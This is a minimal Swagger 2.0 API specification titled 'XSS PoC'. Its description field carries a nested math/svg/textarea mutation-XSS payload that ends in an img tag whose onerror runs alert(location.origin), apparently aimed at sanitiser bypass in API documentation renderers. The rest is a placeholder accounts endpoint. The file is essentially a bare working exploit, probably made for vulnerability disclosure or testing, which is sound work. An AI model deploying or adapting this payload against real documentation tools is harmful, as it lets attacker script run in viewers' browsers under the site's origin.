swagger: '2.0'
info:
  title: XSS PoC
  description: |
    <math><mtext><option><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(location.origin)'>">
paths:
  /whatever:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
